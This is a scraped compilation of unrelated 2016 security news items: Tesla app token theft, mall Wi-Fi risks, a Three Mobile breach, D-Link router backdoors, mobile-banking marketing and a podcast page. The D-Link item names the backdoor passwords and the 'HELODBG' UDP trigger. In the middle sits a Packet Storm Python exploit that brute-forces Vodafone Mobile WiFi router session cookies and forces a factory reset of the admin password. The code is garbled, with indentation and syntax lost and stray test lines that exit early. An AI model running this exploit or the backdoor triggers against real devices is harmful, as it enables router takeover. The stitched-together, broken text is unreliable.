Mobile

Researchers at Norway-based security firm Promon have demonstrated how thieves with the necessary hacking skills can track and steal Tesla vehicles through the carmaker’s Android application.

In a video released this week, experts showed how they could obtain the targeted user’s credentials and leverage the information to track the vehicle and drive it away. There are several conditions that need to be met for this attack and the victim must be tricked into installing a malicious app on their mobile phone, but the researchers believe their scenario is plausible.

According to Promon, the Tesla mobile app uses HTTP requests and an OAuth token to communicate with the Tesla server. The token is valid for 90 days and it allows users to authenticate without having to enter their username and password every time they launch the app.

The problem is that this token is stored in cleartext in the app’s sandbox folder, allowing a remote attacker with access to the device to steal the data and use it to send specially crafted requests to the server. Once they obtain this token, criminals can use it to locate the car and open its doors. In order to enable the keyless driving feature and actually steal the vehicle, they need to obtain the victim’s username and password as well.

Experts believe this can be achieved by tricking the user into installing a piece of malware that modifies the Tesla app and steals the username and password when the victim enters them in the app. According to researchers, the legitimate Tesla app can be modified using one of the many vulnerabilities affecting Android, such as the issue known as TowelRoot. The TowelRoot exploit, which allows attackers to elevate privileges to root, has been used by an Android malware dubbed Godless.

In order to get the victim to install the malicious app, the attacker can use various methods, including free Wi-Fi hotspots.

“When the Tesla owner connects to the Wi-Fi hotspot and visits a web page, he is redirected to a captive portal that displays an advertisement targeting Tesla owners. In [our] example, an app was advertised that offers the Tesla owner a free meal at the nearby restaurant. When the Tesla owner then clicks on the advertisement, he is redirected to the Google Play store where the malicious app is displayed,” experts said.

While there are multiple conditions that need to be met for the attack to work, researchers pointed out that many devices run vulnerable versions of Android and users are often tricked into installing malware onto their devices.

Promon has not disclosed any technical details about the attack method. The company says it has been working with Tesla on addressing the issues. It’s worth noting that Tesla has a bug bounty program with a maximum payout of $ 10,000 for each flaw found in its websites, mobile apps and vehicle hardware.

This is not the first time researchers have demonstrated that Tesla cars can be hacked remotely. A few weeks ago, experts at China-based tech company Tencent showed that they could remotely control an unmodified Tesla Model S while it was parked or on the move. Tesla quickly patched the vulnerabilities found by Tencent, but downplayed their severity, claiming that the attack was not fully remote, as suggested in a video released by experts.

SecurityWeek has reached out to Tesla for comment and will update this article if the company responds.

view counter

Previous Columns by Eduard Kovacs:

Tags:


SecurityWeek RSS Feed

As the biggest shopping weekend of the year in the US approaches, Skycure is advising shoppers to beware of mobile threats while browsing in both physical and online stores.

riskiest shopping malls

Researchers found that mobile shopping dangers are not limited to dangerous Wi-Fi in malls. Malicious apps masquerading as legitimate online stores or ways to get online shopping bargains also appear this time of year, hoping to lure unsuspecting shoppers eager to make a quick purchase on their phones or tablets.

“Black Friday and Cyber Monday are a recipe for cyber-scams,” said Yair Amit, CTO and co-founder of Skycure. “The first brings large groups of people using their mobile phones to one place. The second attracts people who might overlook security to get a better deal. Unfortunately, mobile threats exist for shoppers whether they’re shopping in a store, or on a mobile device from the comfort of their own home or workplace.”

Top 10 riskiest shopping malls for mobile

According to industry statistics, 90 percent of shoppers used a mobile phone inside of a physical store to either look up product information, compare prices or check reviews online in 2015. But before pulling out their mobile phones, shoppers should beware of joining risky Wi-Fi networks while out shopping this holiday season.

Malicious Wi-Fi are set up by cyber criminals specifically to steal shoppers’ data, while risky Wi-Fi networks are misconfigured and expose sensitive mobile data to hackers. Both are dangerous and put mobile shoppers at risk. The most popular data to steal are usernames and passwords.

Below is the list of the top 10 malls with highest number of suspicious Wi-Fi networks. All the shopping centers listed below were found to have five or more risky Wi-Fi networks:

  • Fashion Show, Las Vegas, NV
  • Tysons Corner Center, McLean, VA
  • Yorktown Center, Lombard, IL
  • Town Center at Boca Raton, Boca Raton, FL
  • Sawgrass Mills, Sunrise, FL
  • Mall of America, Bloomington, MN
  • Houston Galleria, Houston, TX
  • King of Prussia Mall, King of Prussia, PA
  • Westfield Garden State, Paramus, NJ
  • Memorial City Mall, Houston, TX.

Avoid malicious commerce apps

Criminals know that people are shopping for bargains around the holidays, and there are many ways to lure people with fake coupons or too-good-to-be-true offers. One way is to offer apps that look like they are from legitimate online stores, either designed to make shopping easier, or to offer discounts or rewards.

Researchers found multiple examples, including the following:

  • A repackaged Starbucks app. Repackaged apps look exactly like the official apps offered by legitimate retailers and other businesses, but have a small amount of malicious code added in.
  • An app called “Amazon Rewards” which is actually a trojan that spreads using SMS messages that fake Amazon vouchers with a link to a fake website. It accesses the user’s contact list so that it can send SMS messages to even more people.

Both apps are examples of ways that hackers use trusted brands and shoppers thirst for deals to infiltrate a mobile device, then steal user data, banking, and/or credit card information.

riskiest shopping malls

Safety tips for shoppers

Skycure offered the following quick tips for mobile users traveling to high-risk destinations:

1. Avoid “Free Wi-Fi” networks (10 percent of malicious networks have the word “Free” in their name).
2. If you see a Wi-Fi that is named as if it is hosted by a store, but that store is nowhere nearby, don’t connect. Skycure found multiple networks named “Apple Store” or “Macysfreewifi” where the named stores were nowhere nearby. Remember that mobile devices automatically join “known” Wi-Fi networks without any user intervention.
3. Only download mobile apps from reputable app stores such as the Google Play store and Apple’s App Store.
4. Read the warnings on your device and don’t click “Continue” if you don’t understand the exposure.
5. Update your device to the most current operating system.
6. Disconnect from the network if your phone behaves strangely (e.g. frequent crashes)
7. Protect your device with a mobile security app.


Help Net Security

Computer hackers have broken into a database of Three Mobile customers and accessed their personal details in order to steal smartphones, the UK network said on Thursday.

A spokesman for the company said there had been an uptick in attempted phone fraud over the past four weeks, both through burglaries of Three retail stores and intercepting customer phone upgrades.

"In order to commit this type of upgrade handset fraud, the perpetrators used authorised logins to Three's upgrade system.

"This upgrade system does not include any customer payment, card information or bank account information," the spokesman said.

Three Mobile Cyber Attack and Data BreachPersonal details including names and addresses were accessed and are believed to have been used by fraudsters to order the phone upgrades, which were sent to eight customers and intercepted.

A probe is currently underway to determine how many more of the company's nine million customers have had their data breached, while the eight known clients have been contacted by Three.

A source close to the matter was quoted by The Telegraph as saying the private information of two thirds of Three customers could be at risk.

"The investigation is ongoing and we have taken a number of steps to further strengthen our controls," said the company spokesman.

Three people were arrested on Wednesday in connection to the fraud and have since been bailed.

A 48-year-old man from Kent, south-east England, and a 39-year-old man from Manchester, north-west England, were arrested on suspicions of computer misuse offences.

A 35-year-old man also from Manchester was arrested on suspicion of attempting to pervert the course of justice.

Related: TalkTalk Handed Record Fine for Data Breach

Related: Information Commissioner Talks Privacy Laws in Post-Brexit UK

view counter

© AFP 2016

Tags:


SecurityWeek RSS Feed

Vulnerabilities, Backdoor Found in D-Link DWR-932B LTE Router

Security researchers have discovered numerous unpatched security vulnerabilities in the D-Link DWR-932B LTE router / access point, including backdoor accounts and default Wi-Fi Protected Setup (WPS) PIN.

The device is being sold in various countries and appears to be customers’ security nightmare because of the numerous security weaknesses. The vulnerabilities were discovered by Pierre Kim, who decided to reveal only the most significant of them, and who says that the issues affect even the latest firmware version released by the vendor.

Earlier this year, Kim disclosed numerous unpatched vulnerabilities affecting the LTE QDH routers made by Quanta, including backdoors, hardcoded PIN, flaws in the web interface, remote code execution issue, and other bugs. The flaws that impact D-Link’s router are similar to those found in Quanta’s device, it seems.

The researcher discovered two backdoor accounts on the device and says that they can be used to bypass the HTTP authentication used to manage the router. There is an “admin” account with password “admin,” as well as a “root” account, with password “1234.” By default, telnetd and SSHd are running on D-Link DWR-932B, yet the latter isn’t documented, the researcher also explains.

Next, there is a backdoor inside the /bin/appmgr program, which allows an attacker to send a specific string in UDP to the router to start an authentication-less telnet server (if a telnetd daemon is not already running). The issue is that the router listens to 0.0.0.0:39889 (UDP) for commands and that it allows access without authentication as root if “HELODBG” is received as command.

D-Link DWR-932B also comes with 28296607 as the default WPS PIN, and has it hardcoded in the /bin/appmgr program. The HostAP configuration contains the PIN as well, and so do the HTTP APIs. What’s more, although the router allows the user to generate a temp PIN for the WPS system, the PIN is weak and uses an algorithm leveraging srand(time(0)) as seed. An attacker knowing the current date as time(0) can generate valid WPS PIN suites and brute-force them, the researcher explains.

Kim also reveals that the file /etc/inadyn-mt.conf contains a user and a hardcoded password, and that the HTTP daemon /bin/qmiweb contains multiple vulnerabilities as well. The router also executes strange, purposeless shell commands as root.

Furthermore, the router supports remote FOTA (Firmware Over The Air) and contains the credentials to contact the server hardcoded in the /sbin/fotad binary, as base64-strings. The researcher discovered that, although the FOTA daemon tries to retrieve the firmware over HTTPS, the SSL certificate has been invalid for one year and a half.

The researcher also reveals that the security level of the UPNP program (miniupnp) in the router is lowered, which allows an attacker located in the LAN area to add Port forwarding from the Internet to other clients located in the LAN. “There is no restriction about the UPnP permission rules in the configuration file, contrary to common usage in UPnP where it is advised to only allow redirection of port above 1024,” Kim notes.

Because of this lack of permission rules, an attacker can forward everything from the WAN into the LAN, the researcher says. This means that they can set rules to allow traffic from the Internet to local Exchange servers, mail servers, FTP servers, HTTP servers, database servers, and the like.

An attacker can overwrite the router’s firmware with a custom firmware if they wanted to, “but with all these vulnerabilities present in the default firmware, I don't think it is worth making the effort,” Kim says. He also notes that, because the device has a sizable memory (168 MB), a decent CPU, and good free space (235 MB), along with complete toolkits installed by default, users should consider trashing it, “because it's trivial for an attacker to use this router as an attack vector.”

D-Link was informed on these issues in June, but the company failed to resolve them until now. Because 90 days have passed since the vulnerabilities were disclosed to the vendor, Kim decided to publish an advisory to reveal these bugs.

This is not the first time D-Link products have made it to the headline due to security vulnerabilities. The company patched a critical flaw in several DIR model routers in August, after a popular D-Link Wi-Fi camera was found in June to be affected by a serious flaw that was subsequently discovered in over 120 D-Link products.

view counter

Ionut Arghire is an international correspondent for SecurityWeek.

Previous Columns by Ionut Arghire:

Tags:


SecurityWeek RSS Feed

mobile security strippedWe’re all familiar with the cartoon image of a character stopping a water leak by plugging a finger into the hole, only for another leak to start, needing another finger, and so on, until the character is soaked by a wave of water.

It’s a little like the current, fragmented state of mobile security – the range of threats is growing fast, outpacing current security measures. Also, the devices themselves have inherent vulnerabilities that can be exploited by resourceful attackers. So it’s no surprise that enterprises are struggling with the issue of mobile security.

Finding flaws and mRATs

The list of potential security challenges and vulnerabilities across Android and iOS devices is complex. It starts with the devices’ mobility: they are connecting to public cellular networks, corporate networks, public hotspots to home internet providers and back again. This makes them vulnerable to Man in the Middle (MitM) attacks via rogue cellular base stations, WiFi hotspots or compromised public networks, allowing attackers to track, intercept and eavesdrop on data traffic and even voice calls, using SS7 protocol exploits.

Then, the Android and iOS mobile operating systems themselves have been shown time and time again to be plagued with vulnerabilities that smart malicious hackers can exploit to their advantage. One major recent example is ‘Quadrooter’, a privilege escalation vulnerability shown to affect over 900 million Android devices. These vulnerabilities often have long patching cycles which can take months to roll out, leaving millions of devices vulnerable to remote attack.

Similarly, iOS has also recently been in the headlines after news broke that it had been compromised in the NSO hack. This affected all Apple devices, making the iOS, the phones resources and any application running on it, including security apps such as anti-virus, vulnerable to attack. It’s worth highlighting that this wasn’t discovered by Apple or any detection applications but was only discovered because the attacker was negligent in concealing it.

Mobile remote access trojans (mRATs) give an attacker the ability to remotely access the resources and functions on Android or iOS devices, and stealthily exfiltrate data without the user being aware. mRATs are often embedded in supposedly benign apps available from appstores. Compromised or falsely certified apps are another security risk, as they can allow attackers to remotely take over devices, using the device resources without the user being aware.

As a result, the mobile security industry is always playing catch-up. Zero-day attacks, where cybercriminals exploit inbuilt vulnerabilities on mobile operating systems that haven’t yet been patched or even identified, are a major ongoing problem.

Protection versus performance

Ultimately, there are three main threat vectors for mobile devices. These are: targeting and intercepting the communications to and from devices; targeting the devices’ external interfaces (Cellular, WiFI, Bluetooth, USB, NFC, Web etc.) for the purpose of device penetration and planting malicious code (virtually as well as physically); and targeting the data on the device and the resources/functions the device/underlying OS provides access to such as microphone, camera, GPS, storage, network connectivity, etc.

While there is a wealth of technologies designed to help manage the security gaps on devices – from Enterprise Mobile Management to mobile anti-malware– these protections come at a price. First, a collection of multiple security tools and processes is a big drain on processing power, complex to manage, and doesn’t really fix the underlying device and OS vulnerabilities. Second, the conventional approach to mobile security is based on locking down or denying features and functions. This causes further problems on the end user’s acceptance front. It’s critical to balance security and usability: If protecting the device forces people to change the way they use it, they will find workarounds that will also undermine security measures.

So if enterprises are to continue harnessing the benefits of mobile devices without compromising their performance and usability, then we need to rethink our approach to mobile security, from the ground up.

Secure foundations

This new approach starts with the foundations of the mobile device: the OS and firmware. As the various software layers on devices have fundamental vulnerabilities which can be exploited, these should be replaced with secure, hardened versions from which the flaws have been removed/patched and advanced security layers have been put in place to effectively manage and protect against those three threat vectors mentioned above. This means attackers cannot use their conventional techniques to target vulnerabilities – but the device is still using an OS that the user is familiar with, giving users access to the full app ecosystem, so usability is not affected or restricted.

This stronger foundation is then used to build a strong, security architecture consisting of four layers to address each of the three main mobile threat vectors. The first layer is the Encryption Layer, in charge of encrypting all data stored on the phone, as well as all traffic from and to the device, securing all communications, whether voice, data or messaging, from any network sniffing and man-in-the-middle attacks.

The second layer is the Protection Layer, securing the device’s externally available interfaces, from WiFi, cellular, USB, NFC, Bluetooth to web. These need protecting against threats using an embedded firewall to monitor and block all downloads and exploit attempts.

Next layer is the Prevention Layer, monitoring for unauthorized attempts to access operating system functions like stored data, the microphone or camera, location technology and so on. These need their own specialist protective technologies.

The final layer is the Detection and Enforcement Layer monitoring, detecting and blocking execution attempts of malicious code or misbehaving apps, in the same way that we currently monitor for device and network anomalies on corporate networks.

In conclusion, mobile security is currently too fragmented, and the range of threats growing too fast for conventional protections. Instead of plugging leaks as they appear, we need to start again, from the foundations up – and fundamentally rethink the way in which we protect and secure mobile devices.


Help Net Security

Hacker Public Radio ~ The Technology Community Podcast Network

Your ideas, projects, opinions - podcasted.

New episodes Monday through Friday.


  • Home »
  • Get Shows
  • Give Shows
  • Contribute
  • About
  • Search
  • Upload

How I record decent audio in my creeper van.

<< First, < Previous, Next >, Latest >>

Hosted by Alpha32 on 2016-09-23 and released under a CC-BY-SA license.
Listen in ogg, spx, or mp3 format. | Comments (0)

Part of the series: Podcasting HowTo

This series is designed to help the new host begin podcasting and to give the experienced host some tips and tricks.
The series is open to all.

I use a Plantronics USB headset, my Chromebook, Linux, and Audacity to record on the go.

Listen Now

Duration: 00:02:24

  • ogg: http://hackerpublicradio.org/eps/hpr2125.ogg
  • spx: http://hackerpublicradio.org/eps/hpr2125.spx
  • mp3: http://hackerpublicradio.org/eps/hpr2125.mp3

<< First, < Previous, Next >, Latest >>


Subscribe to the comments

RSS

feed.

Leave Comment

Powered by Comment Script

Ancestry

  • Radio Freek America
  • BinRev Radio
  • Infonomicon
  • Talk With a Techie

Social

  • Maillist
  • #oggcastplanet
  • Twitter.com
  • Google+
  • Facebook
  • Linked-In
  • iTunes
  • Google Play

Affiliates

  • Hack Radio Live
  • Binary Revolution
  • Hackermedia
  • Infonomicon
  • Packetsniffers

Commons

  • archive.org
  • cchits.net
  • FreeMusi.cc
  • freesound.org
  • librivox.org
  • openclipart.org
  • openfontlibrary.org
  • openrouteservice.org/
  • pixabay.com/

Patrons

  • AnHonestHost.com
  • Archive.org


Information Security Podcasts

BlackBerry and mobile security firm Zimperium have announced that Zimperium's zIPS threat protection system now integrates with the Blackberry EMM, which comprises Good Technology and BES12 enterprise mobile management systems (EMMs).

Because EMMs do not generally include protection against malware and hacker threats, users typically require a separate threat protection system to run with the mobility management system.

Following BlackBerry's purchase of Good Technology and Watchdox , "This is part of a continuing drive for us to provide a complete security solution for the mobile ecosphere," BlackBerry's CSO David Kleidermacher told SecurityWeek. "We do not believe that enterprises should have to shop around for bits and pieces of the solution, but should be able to come to a single supplier for a complete integrated solution."

zIPS is a behavioral analysis system. "We look at three areas," said John Michelsen, Zimperium's Chief Product Officer: "the device, the network, and the applications that run on the device." zIPS continuously monitors for aberrant behavior. "We're checking to see if there has been any exploitation or device tampering; whether there is a network attack in progress such as a man-in-the-middle attack or problems with SSL; or whether there is any malicious activity from any of the apps."

The process is 99% about behavior. "We're the only vendor in mobile," claimed Michelsen, "that had already discovered, had already detected, every fundamental device exploit -- whether it came over Safari payload in iOS, like Trident/Pegasus did; or whether it was StageFright, which was exploited by a maliciously crafted multi-media file sent to an Android device; or malicious apps that download and detonate on the device -- we are the only software that could detect every one of those before they were identified and disclosed."

But being able to detect malicious behavior does not in itself protect against that behavior. Consider ransomware -- detecting the encryption process and determining it is malicious is not enough; the process needs to be stopped immediately. While zIPS itself is primarily behavioral analysis, "There are a number of things we can do on the device immediately," said Michelsen. "We have a cloud-based configuration system called zConsole." It provides security teams with visibility across all devices; and it is where the admin defines what he wants zIPS to do in the event of bad behavior. 

"In many cases," he continued, "we have the ability to do lots of good things without any help from third party software. But it's not complete -- especially in the enterprise context." Here the enterprise will have sensitive data on the users' phones, including company information, company apps and company connectivity. Depending on what activity zIPS detects, the enterprise might for example want to remove the user's entitlement to SharePoint because the hacker could use the phone to read the entire SharePoint repository that the user is able to access. 

"So one of the things the enterprise will want to do that we cannot do ourselves is remove that entitlement. That's why," he added, "we integrate with the EMMs like BlackBerry, and why we integrate to ecosystems like Good. Good gives us the integration between the zIPS app and the Good Technology platform that allows us to trigger remediation immediately in the Good ecosystem."

zIPS has support for all of the major EMMs. The primary ones, said Michelsen, "are BES, AirWatch, Citrix and MobileIron -- with Microsoft improving." The advantage of working with BlackBerry is the market range it covers. "Good itself is not a management system per se," he added: "it's a containerization system." This is particularly attractive to companies that get privacy push back from staff -- Good co-exists on the user's device rather than takes over the management of that device. BES is more of an EMM. Customers, however, can have Good or BES; or both -- and zIPS integrates with whichever configuration.

Gartner recently rated BlackBerry as a top EMM solution currently available. If BlackBerry without zIPS was good, BlackBerry with zIPS is even stronger.

view counter

Kevin Townsend is a Senior Contributor at SecurityWeek. He has been writing about high tech issues since before the birth of Microsoft. For the last 15 years he has specialized in information security; and has had many thousands of articles published in dozens of different magazines – from The Times and the Financial Times to current and long-gone computer magazines.

Previous Columns by Kevin Townsend:

Tags:


SecurityWeek RSS Feed

import urllib2
import json
from datetime import datetime, timedelta
import time
import httplib
from threading import Thread
from Queue import Queue
from multiprocessing import process

print """
Vodafone Mobile WiFi - Password reset exploit (Daniele Linguaglossa)
"""
thread_lock = False
session = ""
def unix_time_millis(dt):
epoch = datetime.utcfromtimestamp(0)
return int(((dt - epoch).total_seconds() * 1000.0) / 1000)

a=False

def check_process_output():
print 1

p = process.Process(target=check_process_output)
p.start()

print a
exit(0)

def crack(queue):
global thread_lock
global session
while True:
if thread_lock:
exit(0)
if not queue.empty():
cookie = queue.get()
headers = 'Referer': 'http://192.168.0.1/home.htm', 'Cookie': "stok=%s" % cookie
req = urllib2.Request("http://192.168.0.1/goform/goform_get_cmd_process?cmd=AuthMode&_=%s"
% time.time(), None, headers)
result = urllib2.urlopen(req).read()
if json.loads(result)["AuthMode"] != "":
print "[+] Found valid admin session!"
print "[INFO] Terminating other threads ... please wait"
session = cookie
queue.task_done()
thread_lock = True

def start_threads_with_args(target, n, arg):
thread_pool = []
for n_threads in range(0, n):
thread = Thread(target=target, args=(arg,))
thread_pool.append(thread)
thread_pool[-1].start()
return thread_pool

def start_bruteforce():
global session
global thread_lock
queue = Queue(0)
start_threads_with_args(crack, 15, queue)
print"[!] Trying fast bruteforce..."
for x in range(0, 1000):
if thread_lock:
break
queue.put("123abc456def789%03d" % x)
while True:
if session != "":
return session
if queue.empty():
break
print "[!] Trying slow bruteforce..."
for milliseconds in range(0, how_many):
if thread_lock:
break
queue.put("123abc456def789%s" % (start + milliseconds))
while True:
if session != "":
return session
if queue.empty():
break
return session
if __name__ == "__main__":
now = datetime.now()
hours = raw_input("How many hours ago admin logged in: ")
minutes = raw_input("How many minutes ago admin logged in: ")
init = datetime(now.year, now.month, now.day, now.hour, now.minute) - timedelta(hours=int(hours), minutes=int(minutes))
end = datetime(now.year, now.month, now.day, 23, 59, 59, 999999)
start = unix_time_millis(init)
how_many = unix_time_millis(end) - start + 1
print "[+] Starting session bruteforce with 15 threads"
valid_session = ""
try:
valid_session = start_bruteforce()
except KeyboardInterrupt:
print "[-] Exiting.."
thread_lock = True
exit(0)
if valid_session == "":
print "[!] Can't find valid session 🙁 quitting..."
exit(0)
print "[+] Resetting router password to 'admin' , network may be down for a while"
headers = 'Referer': 'http://192.168.0.1/home.htm', 'Cookie': "stok=%s" % valid_session
req = urllib2.Request("http://192.168.0.1/goform/goform_set_cmd_process",
"goformId=RESTORE_FACTORY_SETTINGS&_=%s" % time.time(), headers)
try:
urllib2.urlopen(req).read()
except httplib.BadStatusLine:
print "[!] Password resetted to admin! have fun!"
exit(0)
except Exception:
print "[x] Error during password reset"
print "[-] Can't reset password try manually, your session is: %s" % valid_session


Exploit Files ≈ Packet Storm

Banking customers are hesitant to use mobile features due to fraud and security concerns, according to Kaspersky Lab and IDC Financial Insights. Their findings show that of those not using mobile banking at all today (36 percent), 74 percent cited security as the major reason, which could slow the overall adoption of mobile banking services during a time where mobile device usage is exploding.

banking customers

While security concerns are holding back non-mobile banking users from embracing the convenient, digital self-service solutions on the market, those who are active users of mobile banking today also share the same concerns. Of both, users and non-users of mobile banking, 85 percent said that they would increase their usage to “some extent” if there was more security and nearly half (44 percent) of those surveyed said that they would “significantly” increase their mobile banking usage with more security.

For financial organizations, an increase in self-service banking usage can drive revenue and reduce transactional costs, but currently customers don’t see a promising future for mobile banking in their lives – with 32 percent of respondents claiming that they do not ever foresee using mobile as the primary channel that they will engage with their bank or credit union. Banks that do not properly strengthen mobile financial security measures could miss out on a significant business opportunity and risk losing valuable customers in the process.

As financial institutions look for new ways to streamline adoption of self-service banking solutions, it is important that they proactively deploy and implement rigorous security solutions. In addition, banks should also reconsider their education strategies to ensure that customers understand the level of security in their mobile offerings. Survey Respondents want to see a proactive and informative approach to security from their banks with 80 percent indicating that they would like to see evidence of security measures being activated when they launch a mobile banking application.

“Consumers are concerned about security on their mobile devices, which has limited adoption of high margin mobile banking and payment activities including account opening, payments and transfers using a mobile phone.” Says Marc DeCastro, research director IDC Financial Insights. “As the next generation of online, mobile first and mobile only customers begin to explore digital banking choices, financial institutions that have and promote stronger security will attract and retain these customers more easily than those who do not.”

“As financial organizations continue to expand their self-service offerings to drive revenue and increase customer convenience, it’s important to proactively approach security technology for consumers’ mobile devices in the same way banks approach security for their own PC-based solutions, web offerings, and technology networks,” said Ross Hogan, Kaspersky Lab Global Head of Fraud Prevention.


Help Net Security


Assaf Regev

Assaf Regev serves as the product marketing manager for the web fraud portfolio of Trusteer, an IBM Company, part of IBM’s Security Systems division. Assaf holds a BS.c in...

See All Posts

According to data from IDC, the worldwide smartphone market is in excess of 2 billion units. By 2017, the smartphone market share will reach 70.5 percent, up more than 10 percent compared to 2013.

In addition to IDC’s findings, the recent “Consumers and Mobile Financial Services 2016” report stated that 43 percent of mobile phone owners perform online banking via a mobile device, up from 39 percent last year. Additionally, 53 percent of smartphone owners use mobile banking.

A Stake in the Ground

It’s evident that consumers expect to interact with services such as e-commerce, gaming and online banking through their mobile devices. As a result, organizations offering new services must keep up with the ever-growing mobile landscape and any associated regulatory guidelines.

The Federal Financial Institutions Examination Council (FFIEC) recently issued guidance that focused on risks associated with mobile financial services (MFS). The publication also emphasized an enterprisewide risk management approach for more effective risk mitigation.

The agency put a stake in the ground, issuing a new set of security guidelines for mobile banking in late April 2016. This was an important update to the organization’s previously released handbooks. With these new guidelines, the FFIEC set the foundation for 24/7 online banking services of all types, including a set of detailed, actionable directives.

Read the white paper to learn to how to protect Mobile Financial Services

Protecting Mobile Financial Services

More generally, financial institutions looking into protecting existing and new MFS should consider the following:

  • The main channels for mobile banking, such as SMS messaging, mobile-enabled websites, mobile applications and wireless payments;
  • The risks and potential implications on the various aspects of the offered service, including strategic, operational, compliance and reputational risks;
  • The means of identifying, measuring, assessing and mitigating the risks across all applicable categories, which includes the likelihood and impact of such risks and their potential effect on the service and the organization; and
  • The processes and systems in place to help validate and report whether the offered product or service meets operational expectations.

Financial institutions looking to address the above issues must make sure these objectives can be aligned with their short- and long-term strategic plans. To help address security concerns related to mobile financial services, financial institutions can embed the IBM Security Trusteer Mobile SDK in proprietary mobile banking applications via a dedicated security library for Apple iOS and Google Android platforms.

For more information, download the white paper to see how IBM solutions can help protect mobile financial services and provide effective and sustainable fraud prevention.

Topics: Banking, Mobile, Mobile Banking, Mobile Devices, Mobile Security, Risk Management


Security Intelligence